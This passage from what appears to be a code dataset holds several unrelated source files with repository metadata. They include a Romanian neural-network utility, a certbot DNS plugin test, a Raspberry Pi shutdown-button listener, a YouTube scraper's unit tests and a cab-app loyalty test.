66.(6)% din setul de date va fi pentru antrenarea propriu-zisa.\r\n 33.(3)% din setul de date va fi pentru testarea modelului.\r\n :param X: Coefieicentii dependenti si independenti dupa reformatarea sistemelor.\r\n :param Y: Solutiile sistemelor de ecuatii.\r\n :return: Setul de date impartit pentru o antrenare corecta.\r\n \"\"\"\r\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.33, random_state=42)\r\n X_train = np.asarray(X_train)\r\n Y_train = np.asarray(Y_train)\r\n X_test = np.asarray(X_test)\r\n Y_test = np.asarray(Y_test)\r\n\r\n return X_train, X_test, Y_train, Y_test\r\n\r\n\r\ndef plot(history):\r\n \"\"\"\r\n Se creeaza numeroase grafice pe modelul retelei neuronale creat,\r\n :param history: reprezinta modelul retelei neuronale artificiale.\r\n :return: grafic pentru accuratetea atat pentru valorile de antrenare cat si cele de testare.\r\n grafic pentru functia de pierdere atat pentru valorile de antrenare cat si cele de testare.\r\n grafic pentru eroarea patratica medie atat pentru valorile de antrenare cat si cele de testare.\r\n Pe aceste grafice se poate vedea foarte usor daca modelul retelei neuronale este eficace/eficient sau nu.\r\n Accuratetea ar putea fi scrisa ca numarul de predictii corecte / numarul total de predictii, fiind cea importanta,\r\n se poate observa cum accuratetea creste la considerabil la fiecare \"Epoch\" - Iteratie prin setul de date. Ajungand\r\n la peste 85%.\r\n :param history: Datele legate de antrenarea modelului.\r\n :return: Diferite grafice asupra antrentarii modelului.\r\n \"\"\"\r\n plt.figure(1)\r\n\r\n # plt.subplot(1)\r\n # summarize history for accuracy\r\n plt.plot(history.history['accuracy'])\r\n plt.plot(history.history['val_accuracy'])\r\n plt.title('model accuracy')\r\n plt.ylabel('accuracy')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n plt.show()\r\n\r\n # plt.subplot(2)\r\n # summarize history for loss\r\n plt.plot(history.history['loss'])\r\n plt.plot(history.history['val_loss'])\r\n plt.title('model loss')\r\n plt.ylabel('loss')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n # plt.tight_layout()\r\n plt.show()\r\n\r\n # plt.subplot(3)\r\n plt.plot(history.history['mse'])\r\n plt.plot(history.history['val_mse'])\r\n plt.title('Mean squared error')\r\n plt.ylabel('mse')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n plt.show()\r\n\r\n\r\ndef plottingModelPNG(model):\r\n \"\"\"\r\n Se creeaza arhitectura modelului retelei neuronale de tip feedforward. Se afiseaza numarul de straturi si structura\r\n acestora, numarul de neuroni la fiecare strat. De asemenea, se poate observa cand se aplica flatten() si dropout().\r\n :param model: Modelul retelei neuronale creat.\r\n :return: Un PNG cu arhitectura acestui model.\r\n \"\"\"\r\n tf.keras.utils.plot_model(\r\n model, to_file='model.png', show_shapes=True, show_dtype=True,\r\n show_layer_names=True, rankdir='TB', expand_nested=False, dpi=96\r\n )\r\n\r\n\r\ndef raggedTensorChecker(X, Y):\r\n \"\"\"\r\n Daca sistemele din setul de date au rangul diferit, pentru a fi date valide pentru a intra in modelul neuronal,\r\n acestea trebuie transformate in ragged tensors. Altfel spus, inainte de a se apela flatten() pe datele de intrare,\r\n toate sistemele se vor transforma in rangul cel mai mare, iar coeficientii lipsa se vor inlocui cu 0. Trebuie sa\r\n intre un\r\n :param X: Modelul retelei neuronale creat.\r\n :param Y: Modelul retelei neuronale creat.\r\n :return: X,Y transformati in constant ragged tensors.\r\n \"\"\"\r\n print(\"First input data X:\", X[1])\r\n print(\"First output data Y:\", Y[1])\r\n\r\n X = np.array([np.array(val) for val in X])\r\n Y = np.array([np.array(val) for val in Y])\r\n X, Y = shuffle(X, Y, random_state=0)\r\n\r\n print(\"Y[0] - Dataset\", Y[0])\r\n print(\"Y[1] - Dataset\", Y[1])\r\n\r\n X = tf.ragged.constant(X)\r\n Y = tf.ragged.constant(Y)\r\n\r\n print(\"Y[0] SHAPE - DatasetRAGGED\", Y[0].shape)\r\n print(\"Y[1] SHAPE - DatasetRAGGED\", Y[1].shape)\r\n X = X.to_tensor()\r\n Y = Y.to_tensor()\r\n print(\"X[0] SHAPE - DatasetRAGGED - same length\", X[0].shape, X[0])\r\n print(\"X[5] SHAPE - DatasetRAGGED - same length\", X[5].shape, X[5])\r\n print(\"Y[0] SHAPE - DatasetRAGGED - same length\", Y[0].shape, Y[0])\r\n print(\"Y[5] SHAPE - DatasetRAGGED - same length\", Y[5].shape, Y[5])\r\n\r\n return X, Y\r\n\r\n\r\ndef plotMatricesLens(Y):\r\n \"\"\"\r\n Se va crea un grafic cu numarul de sisteme in functie de rangul sau.\r\n @param Y: o matrice cu solutiile sistemelor de ecuatii.\r\n @return:\r\n \"\"\"\r\n dictionaryArray = {}\r\n\r\n for row in Y:\r\n dictionaryArray[len(row)] = dictionaryArray.get(len(row), 0) + 1\r\n\r\n pd.DataFrame(dictionaryArray, index=['Rang matrice']).plot(kind='bar')\r\n\r\n plt.show()\r\n\r\n\r\ndef splitTrainTestForVariousRanksDataset(X, Y):\r\n \"\"\"\r\n Pentru sistemele care sunt stocate in acelasi set de date, indiferent de rangul matriciilor, sistemele se vor\r\n imparti intr-un mod diferit in training - testing data. 80% pentru antrenare, 20% pentru testare.\r\n @param X: Coeficientii dependenti - independenti\r\n @param Y: Solutiile\r\n @return: Set de date pentru antrenare si testare.\r\n \"\"\"\r\n X_train = X[:-20]\r\n X_test = X[-20:]\r\n\r\n Y_train = Y[:-20]\r\n Y_test = Y[-20:]\r\n\r\n return X_train, X_test, Y_train, Y_test\r\n\r\n\r\ndef predictionAndEvaluationOfTheModel(model, X_test, Y_test):\r\n \"\"\"\r\n Dupa ce modelul neuronal este antrenat, se vor face predictii pe setul de date pentru testare. Se vor afisa\r\n adevaratele valori dar si predictiile acestora.\r\n @param model: Modelul neuronal antrenat.\r\n @param X_test: Coeficientii dependenti si independenti (setul de date pentru testare).\r\n @param Y_test: Solutiile sistemelor (setul de date pentru testare).\r\n @return: Se afiseaza adevaratele solutii si predictiile modelului neuronal.\r\n \"\"\"\r\n print(\"Coeficientii sistemului\")\r\n print(X_test)\r\n\r\n print(\"Evaluarea Modelului Antrenat: \")\r\n score = model.evaluate(X_test, Y_test, verbose=0)\r\n print('Test loss:', score[0])\r\n print('Test accuracy:', score[1])\r\n\r\n print(\"Predictia modelului ... \\n--- Predictiile ---\")\r\n print(model.predict(X_test))\r\n print(\"--- Adevaratele valori ---\")\r\n print(Y_test)\r\n\r\n\r\ndef saveAndTestNeuralNetworkModel(model, X_train, Y_train, X_test):\r\n \"\"\"\r\n Se va salva modelul retelei neuronale pentru a putea fi folosit in viitor.\r\n @param model:Modelul neuronal antrenat.\r\n @param X_train: Coeficientii dependenti si independenti 80% (setul de date pentru antrenare).\r\n @param Y_train: Solutiile sistemelor 80% (setul de date pentru antrenare).\r\n @param X_test: Coeficientii dependenti si independenti (setul de date pentru testare).\r\n @return: Model neuronal salvat, acesta se va putea folosi in viitor.\r\n \"\"\"\r\n print(\"Se salveaza modelul in fisierul: saved neural network din folder-ul neural network models results\")\r\n model.save(\"neural network models results/saved neural network\")\r\n reconstructed_model = tf.keras.models.load_model(\"neural network models results/saved neural network\")\r\n print(\"Se verifica egalitatea modelului original cu cel reconstruit.\")\r\n np.testing.assert_allclose(model.predict(X_test), reconstructed_model.predict(X_test))\r\n print(\"Modelul reconstruit este deja compilat si a retinut optimizatorul corespunzator. Antrenamentul se va relua:\")\r\n reconstructed_model.fit(X_train, Y_train)\r\n\r\n\r\ndef testNeuralModelOutputWriteToCsvRealAndPredictedSolutions(testDataset, isItMultiRank, fileName, predicting):\r\n \"\"\"\r\n Se vor stoca solutiile exacte si cele calculate de modelul neuronal in fisiere, pentru a putea compara rezultatele.\r\n @param testDataset: Solutiile sistemelor, rezultatele exacte sau cele prezise de modelul neuronal.\r\n @param isItMultiRank: isItMultiRank = True, daca se vor stoca, mai multe sisteme, indiferent de rang in acelasi set\r\n de date, isItMultiRank = False altfel.\r\n @param fileName: numele fisierului, diferite in functie de algoritm si daca se prezic sau nu solutiile.\r\n @param predicting: boolean care specifica in care fisier trebuie scrise rezultatele. predicting = True semnifica\r\n faptul ca modelul va prezice solutiile si se vor stoca intr-un fisier specific, iar daca predicting = False, atunci\r\n se vor stoca adevaratele valori intr-un fisier (Real Solutions).\r\n @return: Scrierea in fisiere a solutiilor exacte si predictia solutiilor (generate de modelul neuronal.\r\n \"\"\"\r\n if predicting:\r\n f = open('neural network models results/Predicted Solutions ' + fileName, 'w+')\r\n else:\r\n f = open('neural network models results/Real Solutions ', 'w+')\r\n\r\n if isItMultiRank:\r\n header = ['Solutie 1', 'Solutie 2', 'Solutie 3', 'Solutie 4', 'Solutie 5', '...', 'Solutie n']\r\n else:\r\n header = ['Solutie 1', 'Solutie 2']\r\n data = []\r\n writer = csv.writer(f)\r\n writer.writerow(header)\r\n for row in testDataset:\r\n for value in row:\r\n data.append(value)\r\n writer.writerow(data)\r\n data = []\r\n f.close()\r\n\r\n\r\ndef sklearnOutputResults(regressor, X_test, Y_test, algorithm):\r\n \"\"\"\r\n Metoda ajutor pentru \"sklearnModelsUtil\", afiseaza informatii despre modelul neuronal cum ar fi: mae,mse,rmse.\r\n Se vor incerca mai multe modele neuronale (deja implementate, folosite din libraria SKLearn).\r\n @param regressor: modelul retelei neuronale.\r\n @param X_test: Coeficientii dependenti si independenti ai sistemului.\r\n @param Y_test: Solutiile sistemelor de ecuatii.\r\n @param algorithm: numele algoritmului implementat de libraria SKLearn.\r\n @return: Afisarea unor proprietati ale modelelor din SKLearn\r\n \"\"\"\r\n print(algorithm + \" SKLearn Model\")\r\n print(\"Rezultatele modelului neuronal SKLearn (\" + algorithm + \") au fost scrise in fisier\")\r\n print('Mean Absolute Error' + algorithm + ' :',\r\n metrics.mean_absolute_error(Y_test, regressor.predict(X_test)))\r\n print('Mean Squared Error ' + algorithm + ' :', metrics.mean_squared_error(Y_test, regressor.predict(X_test)))\r\n print('Root Mean Squared Error' + algorithm + ' :',\r\n np.sqrt(metrics.mean_squared_error(Y_test, regressor.predict(X_test))))\r\n\r\n\r\ndef sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, algorithm, isItMultiRank):\r\n \"\"\"\r\n Metoda suport pentru sklearnNeuralNet, se afiseaza date despre modelele neuronale din libraria SKLearn.\r\n Se vor afisa predictiile solutiilor si solutiile exacte ale sistemelor de ecuatii.\r\n @param regressor: modelul neuronal al retelei artificial.\r\n @param X_train: Coeficientii dependenti - independenti din setul de date pentru antrenare.\r\n @param Y_train: Solutiile din setul de date pentru antrenare.\r\n @param X_test: Coeficientii dependenti - independenti din setul de date pentru testare.\r\n @param Y_test: Solutiile din setul de date pentru testare.\r\n @param algorithm: numele algoritmului din libraria SKLearn\r\n @return: date despre un model neuronal dat din libraria SKLearn.\r\n \"\"\"\r\n regressor.fit(X_train, Y_train)\r\n print(regressor.score(X_train, Y_train))\r\n print(regressor.coef_)\r\n print(regressor.intercept_)\r\n testNeuralModelOutputWriteToCsvRealAndPredictedSolutions(regressor.predict(X_test), isItMultiRank,\r\n \"SKLearn \" + algorithm + \" model\", True)\r\n testNeuralModelOutputWriteToCsvRealAndPredictedSolutions(Y_test, isItMultiRank, \"SKLearn \" + algorithm + \" model\", False)\r\n sklearnOutputResults(regressor, X_test, Y_test, algorithm)\r\n\r\n\r\ndef sklearnNeuralNet(X_train, Y_train, X_test, Y_test, isItMultiRank):\r\n \"\"\"\r\n Aplica diferite modele neuronale din libraria SKLearn - care rezolva regressii pe setul de date.\r\n @param X_train: Coeficientii dependenti - independenti din setul de date pentru antrenare.\r\n @param Y_train: Solutiile din setul de date pentru antrenare.\r\n @param X_test: Coeficientii dependenti - independenti din setul de date pentru testare.\r\n @param Y_test: Solutiile din setul de date pentru testare.\r\n @return: diferite modele neuronale care rezolva regresii din libraria SKLearn.\r\n \"\"\"\r\n X_train = X_train.reshape(X_train.shape[0], -1)\r\n X_test = X_test.reshape(X_test.shape[0], -1)\r\n\r\n # LinearRegression\r\n regressor = LinearRegression()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"LinearRegression\",isItMultiRank)\r\n\r\n # ElasticNet\r\n regressor = ElasticNet()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"ElasticNet\",isItMultiRank)\r\n\r\n\r\n \"\"\"\r\n X_train = X_train.flatten().reshape(-1,1)\r\n X_test = X_test.flatten().reshape(-1,1)\r\n Y_train = Y_train.flatten().reshape(-1,1)\r\n Y_test = Y_test.flatten().reshape(-1,1)\r\n\r\n\r\n # SVR\r\n regressor = SVR()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"SVR\")\r\n\r\n # SGDRegressor\r\n regressor = SGDRegressor()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"SGDRegressor\")\r\n\r\n # KernelRidge\r\n regressor = KernelRidge()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"KernelRidge\")\r\n\r\n # BayesianRidge\r\n regressor = BayesianRidge()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"BayesianRidge\")\r\n\r\n # GradientBoostingRegressor\r\n regressor = GradientBoostingRegressor()\r\n sklearnModelsUtil(regressor, X_train, Y_train, X_test, Y_test, \"GradientBoostingRegressor\")\r\n \"\"\"","repo_name":"adrianpal123/licenta","sub_path":"Varianta Finala Licenta/NeuralNetUtil.py","file_name":"NeuralNetUtil.py","file_ext":"py","file_size_in_byte":17575,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"33171331878","text":"import pytest\nfrom certbot_dns_glesys import DomainParts, GlesysAuthenticator, GlesysRecord\nfrom unittest.mock import MagicMock\n\n\n# This config just sets all parameters to some value. It's just to make sure\n# that the DNSAuthenticator constructor has all the parameters it might need\nclass PluginConfig:\n verb = \"certonly\"\n config_dir = \"/tmp/cfg\"\n work_dir = \"/tmp/work\"\n logs_dir = \"tmp/log\"\n cert_path = \"./cert.pem\"\n fullchain_path = \"./chain.pem\"\n chain_path = \"./chain.pem\"\n server = \"https://acme-v02.api.letsencrypt.org/directory\"\n\n\nclass GlesysTestAuthenticator(GlesysAuthenticator):\n def __init__(self, client):\n super().__init__(config=PluginConfig, name=\"dns-glesys\")\n self._test_client = client\n def _get_glesys_client(self):\n return self._test_client\n\n\n@pytest.mark.parametrize(\"full_domain\", [\n \"runfalk.se\",\n \"*.runfalk.se\",\n \"acme-v02.api.letsencrypt.org\",\n])\ndef test_domain_parts_init(full_domain):\n d = DomainParts(full_domain)\n assert d.domain == full_domain\n assert d.subdomain is None\n\n\ndef test_domain_parts_iter_variants():\n d = DomainParts(\"*.runfalk.se\")\n expected_variants = {\n d,\n DomainParts(\"runfalk.se\", \"*\"),\n DomainParts(\"se\", \"*.runfalk\"),\n }\n assert set(d.iter_variants()) == expected_variants\n\n\ndef test_domain_parts_iter_variants_complex():\n d = DomainParts(\"acme-v02.api.letsencrypt.org\")\n expected_variants = {\n d,\n DomainParts(\"api.letsencrypt.org\", \"acme-v02\"),\n DomainParts(\"letsencrypt.org\", \"acme-v02.api\"),\n DomainParts(\"org\", \"acme-v02.api.letsencrypt\"),\n }\n assert set(d.iter_variants()) == expected_variants\n\n\ndef test_perform_cleanup_cycle():\n domain = \"*.runfalk.se\" # Unused\n validation_domain = \"_acme-challenge.runfalk.se\"\n validation_key = \"thisgoesinthetetxtrecord\"\n\n glesys_mock = MagicMock()\n def split_domain(d):\n assert d == validation_domain\n return DomainParts(\"runfalk.se\", \"_acme-challenge\")\n glesys_mock.split_domain.side_effect = split_domain\n\n auth = GlesysTestAuthenticator(glesys_mock)\n auth._perform(domain, validation_domain, validation_key)\n glesys_mock.add_record.assert_called_with(\n domain=\"runfalk.se\",\n subdomain=\"_acme-challenge\",\n type=\"TXT\",\n data=validation_key,\n ttl=auth.ttl,\n )\n\n record_id = 20200411\n glesys_mock.list_records.return_value = [\n GlesysRecord(record_id, \"runfalk.se\", \"_acme-challenge\", \"TXT\", validation_key, auth.ttl),\n ]\n auth._cleanup(domain, validation_domain, validation_key)\n glesys_mock.remove_record.assert_called_with(record_id)\n","repo_name":"runfalk/certbot-dns-glesys","sub_path":"test_certbot_dns_glesys.py","file_name":"test_certbot_dns_glesys.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"}
+{"seq_id":"39866922196","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution(object):\n def maxDepth(self, root):\n \"\"\"\n :type root: Node\n :rtype: int\n \"\"\"\n if root == None:\n return 0\n max_depth = 0\n stack = deque([(root,1)])\n \n while stack:\n node,depth = stack.pop()\n max_depth = max(max_depth,depth)\n children = node.children\n for child in children:\n stack.append((child,depth + 1))\n return max_depth\n \n \n \n \n \n ","repo_name":"Ephrem-shimels21/Competitive-Programming","sub_path":"0559-maximum-depth-of-n-ary-tree/0559-maximum-depth-of-n-ary-tree.py","file_name":"0559-maximum-depth-of-n-ary-tree.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12719334509","text":"#!/usr/bin/env python3\n\nimport pigpio\nimport atexit\nimport time\nimport os\nimport sys\n\ngpio = 3\npi = pigpio.pi()\nif not pi.connected:\n print(\"Error: pigpio is not connected. Likely pigpiod is not running.\")\n sys.exit(1)\n\ndef cleanup():\n global pi\n if pi:\n pi.stop()\n pi = None\n\natexit.register(cleanup)\n\npi.set_mode(gpio, pigpio.INPUT)\npi.set_pull_up_down(gpio, pigpio.PUD_UP)\n\nshutdown_counter = 0\n\ndef shutdown_confirmed():\n print(\"Shutdown confirmed\")\n # ensure clean exit\n os.system(\"sudo shutdown -h now\")\n exit()\n\ndef shutdown(gpioIn, level, tick):\n global shutdown_counter\n if gpioIn != gpio:\n exit(1)\n # pull-up logic, normally high, button goes low\n if level == 1:\n shutdown_counter = 0\n else:\n if shutdown_counter == 0:\n shutdown_counter = 1\n\n#pi.set_noise_filter(gpio, 1000, 5000)\ncallback=pi.callback(gpio, pigpio.EITHER_EDGE, shutdown)\n\ntry:\n print(\"Begin shutdown listener\")\n while 1:\n time.sleep(3)\n # shutdown has begun\n if shutdown_counter > 0:\n if shutdown_counter == 1:\n # 1 sleep iteration has passed\n shutdown_counter += 1\n else:\n # 6 seconds have passed\n shutdown_confirmed()\n\nexcept KeyboardInterrupt:\n print(\"\\nExiting shutdown button listener.\")\n exit()\n\nexcept:\n print(\"An unknown error has occured.\")\n\nfinally:\n print(\"End program safe cleanup.\")\n if pi:\n pi.stop()\n pi = None\n","repo_name":"Funmungus/scripts","sub_path":"pi/shutdown_listener.py","file_name":"shutdown_listener.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"38923869893","text":"\"\"\"\n@author : Tien Nguyen\n@date : 2023-05-21\n\"\"\"\n\nimport datetime\n\ndef get_time_now():\n now = datetime.datetime.now()\n return (now.year, now.month, now.day, now.hour, now.minute, now.second)\n\ndef create_report_dir():\n now = get_time_now()\n report_dir = \"\"\n for item in now[:-1]:\n report_dir += str(item)\n report_dir += str(now[-1])\n return report_dir\n","repo_name":"NguyenAnhTien/FLTutorial","sub_path":"src/utils/datetime.py","file_name":"datetime.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"39679571679","text":"import os\nimport django\nfrom menu_app.models import Menu, Item\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings')\ndjango.setup()\n\nmenu = Menu.objects.create(title=\"Menu 8\")\n\n# Создаем элементы меню с 10 уровнями вложенности\nparent_item = None\nfor i in range(1, 11):\n item = Item.objects.create(menu=menu, title=f\"Item {i}b\", parent=parent_item, slug=f\"item{i}b\")\n parent_item = item\n","repo_name":"Miki323/test_menu","sub_path":"add_in_db.py","file_name":"add_in_db.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"23129895432","text":"import os\nimport sys\n\nsys.path.append('.')\nsys.path.append('../')\nimport unittest\n\nimport pytest\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport scrapper as sc\n\n# Test command line\nclass TestMain(unittest.TestCase) :\n\n #Test constructor\n def test_init(self):\n argv = ['scrapper.py', '--output', 'outputtest.json', '--input', 'inputtest.json']\n self.assertEqual(sc.main(argv), 1)\n\n# Test File manager :\n\nclass TestFileManager(unittest.TestCase) :\n\n #Test constructor\n def test_init(self):\n input_file = \"inputtest.json\"\n output_file = \"outputtest.json\"\n manager = sc.FilesManager(input_file, output_file)\n self.assertEqual(manager.input_file, input_file)\n self.assertEqual(manager.output_file, output_file)\n\n # Test read\n def test_read(self):\n input_file = \"inputtest.json\"\n output_file = \"outputtest.json\"\n data = sc.FilesManager(\"inputtest.json\", output_file).read()\n self.assertEqual(data,{'videos_id' : ['fmsoym8I-3o', 'JhWZWXvN_yo']}) \n\n # Test save\n def test_save(self):\n data = {'videos_id' : ['fmsoym8I-3o', 'JhWZWXvN_yo']}\n videos = [sc.Video(id='fmsoym8I-3o', title='Pierre Niney : L’interview face cachée par HugoDécrypte', author='HugoDécrypte', likes=0, description=\"🍿 L'acteur Pierre Niney est dans L’interview face cachée ! Ces prochains mois, le format revient plus fort avec des artistes, sportifs, etc.🔔 Abonnez-vous ...\", links=[], comments=[]), sc.Video(id='JhWZWXvN_yo', title='ELISE LUCET EST SUB CHEZ MOI ?! (Débrief Cash Investigation)', author='ZeratoR', likes=0, description='ABONNE TOI, par pitié : https://www.youtube.com/user/ZeratoRSC2/?sub_confirmation=1Retrouvez-moi en live sur : https://www.twitch.tv/zeratorVOD du live : htt...', links=['https://www.youtube.com', 'https://www.twitch.tv'], comments=[])]\n input_file = \"inputtest.json\"\n output_file = \"outputtest.json\"\n sc.FilesManager(input_file, output_file).save(data,videos)\n self.assertTrue(os.path.exists(output_file) and os.path.getsize(output_file)!=0) \n\n\n# Tests Scrapper :\n\nclass TestScrapper(unittest.TestCase) : \n\n #Test constructor\n def test_init(self):\n data = { \"videos_id\" : [ \"fmsoym8I-3o\", \"JhWZWXvN_yo\" ] }\n scrapper = sc.Scrapper(data[\"videos_id\"])\n self.assertEqual(scrapper.list_id_vid, data[\"videos_id\"])\n\n # Test Find title\n def test_find_title(self):\n data = { \"videos_id\" : [ \"fmsoym8I-3o\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=fmsoym8I-3o\")\n soup = BeautifulSoup(req.content, 'html.parser')\n title = sc.Scrapper(data[\"videos_id\"]).find_title(soup)\n self.assertEqual(title, \"Pierre Niney : L\\u2019interview face cach\\u00e9e par HugoD\\u00e9crypte\" )\n\n def test_find_title_null(self):\n data = { \"videos_id\" : [ \"000000\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=000000\")\n soup = BeautifulSoup(req.content, 'html.parser')\n title = sc.Scrapper(data[\"videos_id\"]).find_title(soup)\n self.assertEqual(title,\"\")\n\n # Test Find author\n def test_find_author(self):\n data = { \"videos_id\" : [ \"fmsoym8I-3o\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=fmsoym8I-3o\")\n soup = BeautifulSoup(req.content, 'html.parser')\n author = sc.Scrapper(data[\"videos_id\"]).find_author(soup)\n self.assertEqual(author, \"HugoD\\u00e9crypte\")\n\n def test_find_author_null(self):\n data = { \"videos_id\" : [ \"000000\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=000000\")\n soup = BeautifulSoup(req.content, 'html.parser')\n author = sc.Scrapper(data[\"videos_id\"]).find_author(soup)\n self.assertEqual(author, \"\")\n \n # Test Find description \n def test_find_description(self):\n data = { \"videos_id\" : [ \"JhWZWXvN_yo\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=JhWZWXvN_yo\")\n soup = BeautifulSoup(req.content, 'html.parser')\n desc = sc.Scrapper(data[\"videos_id\"]).find_description(soup)\n self.assertEqual(desc,\"ABONNE TOI, par piti\\u00e9 : https://www.youtube.com/user/ZeratoRSC2/?sub_confirmation=1Retrouvez-moi en live sur : https://www.twitch.tv/zeratorVOD du live : htt...\")\n\n def test_find_description_null(self):\n data = { \"videos_id\" : [ \"000000\"] }\n req = requests.get(\"https://www.youtube.com/watch?v=000000\")\n soup = BeautifulSoup(req.content, 'html.parser')\n desc = sc.Scrapper(data[\"videos_id\"]).find_description(soup)\n self.assertEqual(desc, \"\")\n\n # Test find_links\n def test_find_links(self):\n data = { \"videos_id\" : [ \"JhWZWXvN_yo\"] }\n description = \"ABONNE TOI, par piti\\u00e9 : https://www.youtube.com/user/ZeratoRSC2/?sub_confirmation=1Retrouvez-moi en live sur : https://www.twitch.tv/zeratorVOD du live : htt...\"\n links = sc.Scrapper(data[\"videos_id\"]).find_links(description)\n print(links)\n self.assertEqual(links,['https://www.youtube.com/user/ZeratoRSC2/?sub_confirmation=1Retrouvez-moi', 'https://www.twitch.tv/zeratorVOD'])\n\n def test_find_links_null(self):\n data = { \"videos_id\" : [ \"000000\"] }\n description = \"\"\n links = sc.Scrapper(data[\"videos_id\"]).find_links(description)\n self.assertEqual(links, [])\n\n # Test Scrap\n def test_find_scrap(self):\n data = { \"videos_id\" : [\"fmsoym8I-3o\",\"JhWZWXvN_yo\",\"vcORt-798EU\",\"dV360CxA2BQ\",\"000000\"]}\n result = sc.Scrapper(data[\"videos_id\"]).scrap()\n self.assertEqual(len(result), len(data[\"videos_id\"]))\n\n\n\n\n# Test conditions\n\n","repo_name":"trujillola/ScrappingYT","sub_path":"tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"34572256886","text":"from datetime import datetime\nfrom typing import List\nfrom unittest import TestCase\n\nimport pytz\nfrom dateutil.relativedelta import relativedelta\nfrom fastapi_events import middleware_identifier\nfrom freezegun import freeze_time\nfrom mockito import when, ANY\n\nfrom cabs_application import CabsApplication\nfrom config.app_properties import AppProperties\nfrom core.database import create_db_and_tables, drop_db_and_tables\nfrom crm.client import Client\nfrom loyalty.awarded_miles import AwardedMiles\nfrom loyalty.awards_account_repository import AwardsAccountRepositoryImp\nfrom loyalty.awards_service import AwardsService\nfrom loyalty.awards_service_impl import AwardsServiceImpl\nfrom geolocation.geocoding_service import GeocodingService\nfrom money import Money\nfrom pricing.tariff import Tariff\nfrom pricing.tariffs import Tariffs\n\nfrom tests.common.fixtures import DependencyResolver, Fixtures\n\ndependency_resolver = DependencyResolver()\n\n\nclass TestRemovingAwardMilesIntegration(TestCase):\n TRANSIT_ID: int = 1\n\n DAY_BEFORE_YESTERDAY = datetime(1989, 12, 12, 12, 12).astimezone(pytz.utc)\n YESTERDAY = DAY_BEFORE_YESTERDAY + relativedelta(days=1)\n TODAY = YESTERDAY + relativedelta(days=1)\n SUNDAY = datetime(1989, 12, 17, 12, 12).astimezone(pytz.utc)\n\n awards_service: AwardsService = dependency_resolver.resolve_dependency(AwardsServiceImpl)\n awards_account_repository: AwardsAccountRepositoryImp = dependency_resolver.resolve_dependency(\n AwardsAccountRepositoryImp)\n fixtures: Fixtures = dependency_resolver.resolve_dependency(Fixtures)\n app_properties: AppProperties = dependency_resolver.resolve_dependency(AppProperties)\n geocoding_service: GeocodingService = dependency_resolver.resolve_dependency(GeocodingService)\n tariffs: Tariffs = dependency_resolver.resolve_dependency(Tariffs)\n\n async def setUp(self):\n create_db_and_tables()\n app = CabsApplication().create_app()\n middleware_identifier.set(app.middleware_stack.app._id)\n\n async def test_by_default_remove_oldest_first_even_when_they_are_non_expiring(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n middle: AwardedMiles = self.granted_miles_that_will_expire_in_days(10, 365, self.YESTERDAY, client)\n youngest: AwardedMiles = self.granted_miles_that_will_expire_in_days(10, 365, self.TODAY, client)\n oldest_non_expiring_miles: AwardedMiles = self.granted_non_expiring_miles(5, self.DAY_BEFORE_YESTERDAY, client)\n\n # when\n with freeze_time(self.DAY_BEFORE_YESTERDAY):\n self.awards_service.remove_miles(client.id, 16)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(oldest_non_expiring_miles, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(middle, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(youngest, 9, awarded_miles)\n\n async def test_should_remove_oldest_miles_first_when_many_transits(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n when(self.tariffs).choose(ANY).thenReturn(Tariff(km_rate=0, name=\"fake\", base_fee=Money(10)))\n self.fixtures.client_has_done_transits(client, 15, self.geocoding_service)\n # and\n oldest = self.granted_miles_that_will_expire_in_days(10, 60, self.DAY_BEFORE_YESTERDAY, client)\n middle = self.granted_miles_that_will_expire_in_days(10, 365, self.YESTERDAY, client)\n youngest = self.granted_miles_that_will_expire_in_days(10, 60, self.TODAY, client)\n\n # when\n with freeze_time(self.TODAY):\n self.awards_service.remove_miles(client.id, 15)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(oldest, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(middle, 5, awarded_miles)\n 